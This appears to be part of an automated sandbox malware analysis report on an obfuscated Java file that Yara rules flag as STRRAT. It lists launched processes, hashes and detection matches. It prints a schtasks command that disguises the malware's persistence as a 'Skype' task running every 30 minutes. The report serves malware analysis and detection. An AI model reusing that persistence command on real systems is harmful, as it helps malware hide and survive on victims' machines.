                                                                                                                                          Start time:21:04:26
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\vmlpusjwhz.txt'
                                                                                                                                          Imagebase:0xf0000
                                                                                                                                          File size:192376 bytes
                                                                                                                                          MD5 hash:28733BA8C383E865338638DF5196E6FE
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 0000000D.00000002.253231810.000000000A5A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_STRRAT, Description: Yara detected STRRAT, Source: 0000000D.00000002.252958465.0000000005427000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_STRRAT, Description: Yara detected STRRAT, Source: 0000000D.00000002.252569519.00000000051C5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 0000000D.00000002.253164708.000000000A56E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          Reputation:moderate

                                                                                                                                          Analysis Process: conhost.exe PID: 5988 Parent PID: 720

                                                                                                                                          General

                                                                                                                                          Start time:21:04:28
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                                                          File size:625664 bytes
                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Analysis Process: cmd.exe PID: 5848 Parent PID: 720

                                                                                                                                          General

                                                                                                                                          Start time:21:04:34
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
                                                                                                                                          Imagebase:0xbd0000
                                                                                                                                          File size:232960 bytes
                                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Analysis Process: java.exe PID: 4952 Parent PID: 720

                                                                                                                                          General

                                                                                                                                          Start time:21:04:34
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
                                                                                                                                          Imagebase:0xf0000
                                                                                                                                          File size:192376 bytes
                                                                                                                                          MD5 hash:28733BA8C383E865338638DF5196E6FE
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_STRRAT, Description: Yara detected STRRAT, Source: 00000010.00000002.519763899.0000000004ECD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_STRRAT, Description: Yara detected STRRAT, Source: 00000010.00000002.517894566.0000000004DCD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000010.00000002.520726996.0000000009F9E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000010.00000002.520453366.0000000009F6C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          Reputation:moderate

                                                                                                                                          Analysis Process: conhost.exe PID: 3096 Parent PID: 5848

                                                                                                                                          General

                                                                                                                                          Start time:21:04:34
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                                                          File size:625664 bytes
                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          Analysis Process: conhost.exe PID: 4904 Parent PID: 4952

                                                                                                                                          General

                                                                                                                                          Start time:21:04:35
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                                                          File size:625664 bytes
                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          Analysis Process: schtasks.exe PID: 5312 Parent PID: 5848

                                                                                                                                          General

                                                                                                                                          Start time:21:04:35
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
                                                                                                                                          Imagebase:0x7ff7ca4e0000
                                                                                                                                          File size:185856 bytes
                                                                                                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          Analysis Process: notepad.exe PID: 2596 Parent PID: 528

                                                                                                                                          General

                                                                                                                                          Start time:21:04:36
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\notepad.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\NOTEPAD.EXE C:\Users\user\AppData\Roaming\vmlpusjwhz.txt
                                                                                                                                          Imagebase:0x7ff7977d0000
                                                                                                                                          File size:245760 bytes
                                                                                                                                          MD5 hash:BB9A06B8F2DD9D24C77F389D7B2B58D2
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          Analysis Process: java.exe PID: 6284 Parent PID: 4952

                                                                                                                                          General

                                                                                                                                          Start time:21:04:40
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp
                                                                                                                                          Imagebase:0xf0000
                                                                                                                                          File size:192376 bytes
                                                                                                                                          MD5 hash:28733BA8C383E865338638DF5196E6FE
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_STRRAT, Description: Yara detected STRRAT, Source: 00000018.00000002.521334832.000000000A810000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_STRRAT, Description: Yara detected STRRAT, Source: 00000018.00000002.517833863.000000000543D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000018.00000002.520047801.000000000A56A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000018.00000002.520214796.000000000A5A2000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                          Analysis Process: conhost.exe PID: 6364 Parent PID: 6284

                                                                                                                                          General

                                                                                                                                          Start time:21:04:42
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                                                          File size:625664 bytes
                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          Analysis Process: notepad.exe PID: 6576 Parent PID: 3388

                                                                                                                                          General

                                                                                                                                          Start time:21:04:46
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\notepad.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\vmlpusjwhz.txt
                                                                                                                                          Imagebase:0x7ff7977d0000
                                                                                                                                          File size:245760 bytes
                                                                                                                                          MD5 hash:BB9A06B8F2DD9D24C77F389D7B2B58D2
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          Analysis Process: notepad.exe PID: 7136 Parent PID: 3388

                                                                                                                                          General

                                                                                                                                          Start time:21:04:55
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\notepad.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\vmlpusjwhz.txt
                                                                                                                                          Imagebase:0x7ff7977d0000
                                                                                                                                          File size:245760 bytes
                                                                                                                                          MD5 hash:BB9A06B8F2DD9D24C77F389D7B2B58D2
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          Analysis Process: javaw.exe PID: 4880 Parent PID: 3388

                                                                                                                                          General

                                                                                                                                          Start time:21:05:03
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp
                                                                                                                                          Imagebase:0xd60000
                                                                                                                                          File size:192376 bytes
                                                                                                                                          MD5 hash:4BFEB2F64685DA09DEBB95FB981D4F65
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000024.00000002.317682510.0000000004E1D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000024.00000002.317809866.0000000004E65000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000024.00000002.317648149.0000000004E10000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                          Analysis Process: notepad.exe PID: 6504 Parent PID: 3388

                                                                                                                                          General

                                                                                                                                          Start time:21:05:11
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\notepad.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\vmlpusjwhz.txt
                                                                                                                                          Imagebase:0x7ff7977d0000
                                                                                                                                          File size:245760 bytes
                                                                                                                                          MD5 hash:BB9A06B8F2DD9D24C77F389D7B2B58D2
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          Analysis Process: javaw.exe PID: 6568 Parent PID: 3388

                                                                                                                                          General

                                                                                                                                          Start time:21:05:20
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp
                                                                                                                                          Imagebase:0xd60000
                                                                                                                                          File size:192376 bytes
                                                                                                                                          MD5 hash:4BFEB2F64685DA09DEBB95FB981D4F65
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000027.00000002.352640886.000000000461D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000027.00000002.352612506.0000000004610000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000027.00000002.352788509.0000000004665000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                          Disassembly

                                                                                                                                          Code Analysis

                                                                                                                                          Reset < >